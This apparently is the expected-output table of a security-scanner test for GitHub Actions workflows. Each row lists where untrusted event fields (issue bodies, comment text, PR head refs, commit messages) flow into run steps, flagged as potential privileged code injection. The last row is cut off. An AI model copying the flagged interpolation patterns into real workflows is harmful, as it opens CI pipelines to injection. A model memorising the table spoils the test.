| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. 
